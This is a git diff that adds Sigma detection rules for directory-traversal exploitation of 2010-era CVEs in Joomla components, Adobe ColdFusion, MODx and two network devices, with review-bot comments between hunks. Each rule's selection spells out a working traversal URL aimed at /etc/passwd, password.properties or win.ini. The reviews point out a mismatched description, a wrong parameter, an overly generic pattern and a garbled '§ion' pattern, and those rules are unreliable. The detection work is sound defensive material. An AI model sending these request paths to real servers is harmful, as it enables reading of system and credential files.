+ selection:
+ c-uri|contains:
+ - /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml
new file mode 100644
index 00000000..557f28d2
--- /dev/null
+++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1722 exploitation attempt
+id: 850fafc1-3151-48b6-b25a-41c3543df57c
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Online Market 2.x - Local File Inclusion:Directory
+ traversal vulnerability in the Online Market (com_market) component 2.x for Joomla!
+ allows remote attackers to read arbitrary files and possibly have unspecified other
+ impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml
new file mode 100644
index 00000000..3a52358d
--- /dev/null
+++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1875 exploitation attempt
+id: 335b7e25-03d9-40b9-9f3a-82fdfce99af1
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Property - Local File Inclusion:Directory traversal
+ vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for
+ Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml
new file mode 100644
index 00000000..20e8f0b7
--- /dev/null
+++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1953 exploitation attempt
+id: 72936897-8824-4fa8-9ecf-dbbc5f19e53a
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion:Directory
+ traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml
new file mode 100644
index 00000000..30ecafe1
--- /dev/null
+++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1954 exploitation attempt
+id: 0159a66f-50f9-4485-b681-756fa2d16ce8
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion:Directory
+ traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component
+ 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a ..
+ (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml
new file mode 100644
index 00000000..f4c424f8
--- /dev/null
+++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1955 exploitation attempt
+id: 9a0064ff-3544-4130-aaec-a8547645f44d
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion:Directory
+ traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml
new file mode 100644
index 00000000..7d33c368
--- /dev/null
+++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1956 exploitation attempt
+id: 87412ddd-24a7-4d25-98b7-1df572fcac16
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Directory
+ traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0
+ and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml
new file mode 100644
index 00000000..f91073b5
--- /dev/null
+++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1979 exploitation attempt
+id: c56ae44a-bf7b-4643-a2f8-6935f792684c
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Directory
+ traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build
+ 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
+ in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml
new file mode 100644
index 00000000..26b19ee7
--- /dev/null
+++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1980 exploitation attempt
+id: 33689775-59d1-4bb4-84e6-4c659819e740
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directory
+ traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr)
+ component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary
+ local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml
new file mode 100644
index 00000000..fa7dba17
--- /dev/null
+++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1981 exploitation attempt
+id: 7b1693c7-dfb2-4bc2-a100-8ff973053339
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory traversal
+ vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml
new file mode 100644
index 00000000..7ba0e0c8
--- /dev/null
+++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1983 exploitation attempt
+id: 1ccbc483-aa94-436c-ae2c-c0ff89c88950
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory traversal
+ vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the view parameter to index.php
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml
new file mode 100644
index 00000000..a12fc270
--- /dev/null
+++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-2033 exploitation attempt
+id: 5f65aa73-1a1f-44f6-9df4-2a593d83ca47
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory traversal
+ vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x
+ for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml
new file mode 100644
index 00000000..23959387
--- /dev/null
+++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml
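Review bot: The `description` of the CVE-2010-2033 rule does not describe the rule: the title names Percha Categories Tree 0.6 and the selection matches `option=com_perchacategoriestree`, but the description text is about the Percha Fields Attach (com_perchafieldsattach) component 1.x, which is the text the CVE-2010-2036 rule later in this commit uses. An analyst triaging a hit would be pointed at the wrong component. The description should be replaced with the advisory text for the Categories Tree component (com_perchacategoriestree) so that title, description and selection agree.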
@@ -0,0 +1,24 @@
+title: CVE-2010-2034 exploitation attempt
+id: fa7d6a2c-4fef-49cc-9b80-07edaa2687c2
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Directory
+ traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component
+ 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml
new file mode 100644
index 00000000..37cd635f
--- /dev/null
+++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-2035 exploitation attempt
+id: 517f9070-1bd8-4e24-ab39-17e41e353ab6
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Directory
+ traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6
+ Beta for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml
new file mode 100644
index 00000000..3f7221ee
--- /dev/null
+++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-2036 exploitation attempt
+id: 99462979-ccf6-4c28-a108-fd2d958d39e0
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Directory
+ traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component
+ 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml
new file mode 100644
index 00000000..de75a78a
--- /dev/null
+++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-2122 exploitation attempt
+id: 993b1828-3194-4686-87b6-14b893a2ac1e
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Directory
+ traversal vulnerability in the SimpleDownload (com_simpledownload) component before
+ 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local
+ files via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml
new file mode 100644
index 00000000..fe81d09a
--- /dev/null
+++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml
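Review bot: The CVE-2010-2122 rule's description says the traversal is "in the controller parameter to index.php", but the selection matches `task=download&fileid=`, so the description and the detection disagree about which parameter is vulnerable. One of the two was copied from a different rule; the advisory should be checked and either the description changed to name the `fileid` parameter or the selection corrected to match the `controller` parameter. The description's "Local File Disclosure" and "include and execute arbitrary local files" also describe two different impacts; keep the one the advisory supports.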
@@ -0,0 +1,24 @@
+title: CVE-2010-2259 exploitation attempt
+id: 12a63c52-1a42-437a-90cc-950a4cf6b3ab
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory traversal
+ vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote
+ attackers to include and execute arbitrary local files via a .. (dot dot) in the
+ controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml
new file mode 100644
index 00000000..e77c8288
--- /dev/null
+++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-2307 exploitation attempt
+id: f2029a95-84dc-427f-a112-f5e373e791ff
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM -
+ Directory Traversal:Multiple directory traversal vulnerabilities in the web server
+ for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC
+ allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
+ (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../etc/passwd
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml
new file mode 100644
index 00000000..6f88ea8d
--- /dev/null
+++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml
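Review bot: The selection `/../../etc/passwd` is not tied to the Motorola SURFboard in any way: it matches a traversal probe against any host, and because `contains` is a substring test it also fires on the longer generic payload used by the CVE-2010-4231 (Camtron camera) rule in a later hunk, so both `critical` rules trigger on the same request. Neither rule can honestly be titled an exploitation attempt for its CVE when nothing product-specific is matched. If no device-specific URI path is available from the advisory, the two are better merged into one generic "directory traversal in URI" rule at a lower level, with a description that does not claim a specific CVE.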
@@ -0,0 +1,24 @@
+title: CVE-2010-2682 exploitation attempt
+id: 93d57e84-a8e0-40c6-9d5f-679419117413
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion:Directory
+ traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15
+ for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml
new file mode 100644
index 00000000..8e1345f2
--- /dev/null
+++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-2861 exploitation attempt
+id: 51f51d47-b13c-4305-b017-f367e790e2cd
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory traversal
+ vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier
+ allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm,
+ (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm,
+ and (5) enter.cfm in CFIDE/administrator/.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml
new file mode 100644
index 00000000..da22cf06
--- /dev/null
+++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-2920 exploitation attempt
+id: e5195f58-f828-4ab2-a609-23eaaf46de44
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion:Directory
+ traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component
+ 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory
+ traversal sequences in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml
new file mode 100644
index 00000000..6bb330c8
--- /dev/null
+++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-3426 exploitation attempt
+id: aa48eb4c-9028-4d0f-b6be-83f52bc805f7
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directory
+ traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha
+ 3 for Joomla! allows remote attackers to include and execute arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml
new file mode 100644
index 00000000..a0476b22
--- /dev/null
+++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-4231 exploitation attempt
+id: c60db1d4-a919-4cbc-bcba-3271b2fd0e6b
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Camera
+ has a built-in web server that is enabled by default. The server is vulnerable to
+ directory transversal attacks, allowing access to any file on the camera file system.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../../../../../../../../../../../../etc/passwd
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml
new file mode 100644
index 00000000..33f2bc11
--- /dev/null
+++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-4617 exploitation attempt
+id: a7745670-2ad1-411a-8e6d-c43bc9942139
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory traversal
+ vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows
+ remote attackers to read arbitrary files via directory traversal sequences in the
+ section parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml
new file mode 100644
index 00000000..14abd22d
--- /dev/null
+++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml
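Review bot: The CVE-2010-4617 selection reads `/index.php?option=com_jotloader§ion=...`: the `&sect` of `&section=` has been turned into the `§` character, so the pattern cannot match a request for the `section` parameter that the description names and the rule is silently dead. This may only be an artefact of how this page renders the diff, so the committed file should be checked for the literal `&section=`; if the `§` is really in the file, the line must read `- /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00`. A rule test that feeds the documented request through the converter would have caught this.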
@@ -0,0 +1,24 @@
+title: CVE-2010-5278 exploitation attempt
+id: 37dbe173-d9f1-400b-862e-cceef489ef6f
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: MODx manager - Local File Inclusion:Directory traversal vulnerability
+ in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and
+ possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to
+ read arbitrary files via a .. (dot dot) in the class_key parameter.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
deleted file mode 100644
index a6ec1f7d..00000000
--- a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-0943 exploitation attempt
-id: fa7e28e3-d286-4c38-b6df-41eb004b66ba
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter in a jashowcase action to index.php.
-references:
-- https://www.exploit-db.com/exploits/11090
-- https://www.cvedetails.com/cve/CVE-2010-0943
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
deleted file mode 100644
index f96cb67b..00000000
--- a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-0944 exploitation attempt
-id: c656c178-4f5a-4dc4-a605-21e225987ac5
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JCollection (com_jcollection)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11088
-- https://www.cvedetails.com/cve/CVE-2010-0944
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
